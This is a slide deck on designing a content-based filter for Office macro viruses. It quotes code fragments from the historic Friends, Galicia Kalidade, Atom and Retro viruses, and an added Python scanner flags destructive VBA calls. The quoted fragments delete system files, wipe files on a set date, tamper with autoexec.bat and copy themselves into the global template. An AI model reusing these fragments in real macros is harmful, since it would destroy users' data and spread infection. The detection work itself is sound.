Published by Shana McBride. Modified over 9 years ago.
Slide 2: Design and Implementation of The FiltroMatic™
Presented by: Lord Viper Scorpion, D4 C0rrupt0r, The Dark Stallion of Chaos, Master of Terror
Slide 3: Why Worry About Macro Viruses?
There are a lot of maladjusted individuals with no better way to deal with their frustration with society.
Microsoft allows macros way too many privileges, and this is really easy to exploit.
Macro viruses cause a lot of damage:
– $12.1B in 1999, according to Computer Economics
– Melissa alone caused $80 million in damage
Slide 4: Why Are Current Methods Ineffective and How Can We Improve Them?
Commercial anti-virus programs only check for fingerprints of known viruses.
We propose a generalized macro filter that looks for viruses based on the content of the code.
How does one determine whether code is “bad” or not?
Slide 5: VBA Background
What is VBA and how is it used?
– General-purpose scripting language for Office applications
– Used to automate repetitive tasks, format documents, …
Where does it derive its functionality?
– From Application object libraries
– From the Windows API and .DLLs on the host system
So what’s the problem?
– A VBA macro has the same privileges on the host as a native executable
Slide 6: Dealing with Microsoft’s Lack of Foresight
How can we compensate for the security vulnerabilities introduced by VBA?
– By scanning macros for code that is clearly malicious
– By alerting the user to possible misuse of code that could go either way
– By trying to identify malicious macros without flagging legitimate ones
Slide 7: Designing a Macro Filter
Background research:
– Learned VBA mechanisms
– Reviewed known malicious macros
– Compiled a list of VBA functions common to macro viruses
– Reviewed legitimate macros to determine where “gray” areas exist
Slide 8: Example of VBA Malcode
From the “Friends” macro virus:
    Open "C:\autoexec.bat" For Append As #1
    Print #1, "@echo off"
    Print #1, "c:\dos\fast.com"
    Close #1
Slide 9: Another Example of VBA Malcode
From the “Galicia Kalidade” macro virus:
    If EdicinBuscarEncontrado() <> 0 Then
        FijarAtributos "C:\IO.SYS", 0
        FijarAtributos "C:\MSDOS.SYS", 0
        Kill "C:\IO.SYS"
        Kill "C:\MSDOS.SYS"
Slide 10: Yet Another VBA Malcode Example
From the “Atom” macro virus:
    Sub MAIN
    On Error Goto KillError
    If Day(Now()) = 13 And Month(Now() = 12) Then
        Kill "*.*"
    End If
    KillError:
    End Sub
Slide 11: Yes, You Guessed It … Another VBA Virus Example
From the “Retro” macro virus:
    If Not Y Then
        F$ = WindowName$()
        S$ = F$ + ":Puritan"
        MacroCopy S$, "Global:Puritan"
        S$ = F$ + ":Rtr"
        MacroCopy S$, "Global:Retro"
        S$ = F$ + ":FSAB"
        MacroCopy S$, "Global:FileSaveAs"
        S$ = F$ + ":FSAB"
        MacroCopy S$, "Global:FSAB"
        S$ = F$ + ":AOB"
        MacroCopy S$, "Global:AOB"
    End If
Slide 12: Implementation of Our Filter
We chose to implement it as a Java library that developers can integrate into their applications.
The implementation consists of the classes MacroScanner, MalCodeItem, MalCodeList, Report, and ReportItem.
The scanner was tailored to minimize false positives.
What weaknesses does our method have?
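A content-based scanner in the spirit of slides 6, 7 and 12, added here as an illustration in Python; it is not the FiltroMatic Java library, and the rule list, the "bad"/"gray" severities and the sample macros are constructed for this example from the mechanisms the slides' virus samples use.

```python
import re
from dataclasses import dataclass

# Constructed rule list (an assumption for this example), modelled on the
# mechanisms seen on the slides: writing autoexec.bat, Kill, MacroCopy.
# "bad" = clearly malicious; "gray" = could go either way, alert the user.
RULES = [
    ("bad",  r"\bKill\b",                            "deletes files"),
    ("bad",  r"\bMacroCopy\b",                       "copies a macro into the global template"),
    ("bad",  r"\bOpen\s+\"[^\"]*autoexec\.bat\"",     "rewrites autoexec.bat"),
    ("gray", r"\bOpen\b.*\bFor\s+(Append|Output)\b",  "writes a file on disk"),
    ("gray", r"\bSetAttr\b|\bFijarAtributos\b",      "changes file attributes"),
    ("gray", r"\bShell\b",                           "launches an external program"),
]

@dataclass
class ReportItem:          # hypothetical stand-in for the library's ReportItem
    line_no: int
    severity: str
    description: str
    source: str

def scan_macro(vba: str) -> list:
    """One ReportItem per rule hit; comment lines are skipped, string literals kept."""
    items = []
    for n, raw in enumerate(vba.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue
        for severity, pattern, description in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                items.append(ReportItem(n, severity, description, line))
    return items

def verdict(items) -> str:
    if any(i.severity == "bad" for i in items):
        return "malicious"
    return "suspicious" if items else "clean"

def report(vba: str) -> str:
    items = scan_macro(vba)
    rows = [f"{i.severity.upper():5} line {i.line_no}: {i.description}  <- {i.source}"
            for i in items]
    return "\n".join(rows + [f"verdict: {verdict(items)}"])

# Constructed samples: a fragment in the style of the "Friends" slide, and a benign macro
FRIENDS = 'Open "C:\\autoexec.bat" For Append As #1\nPrint #1, "@echo off"\nClose #1'
LEGIT = "Sub BoldSelection()\n    Selection.Font.Bold = True\nEnd Sub"
```

A "gray" hit alone yields "suspicious", which is the user-alert case from slide 6; a legitimate logging macro that opens a file For Output lands there rather than being blocked outright.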
Slide 13: Sample of Scanning Results for Malicious Macros
Slide 14: Sample of Scanning Results for Legitimate Macros
Slide 15: Conclusions
Macro viruses tend to use the same mechanisms to spread and attack.
Our filter takes advantage of these similarities to detect known and unknown macro viruses.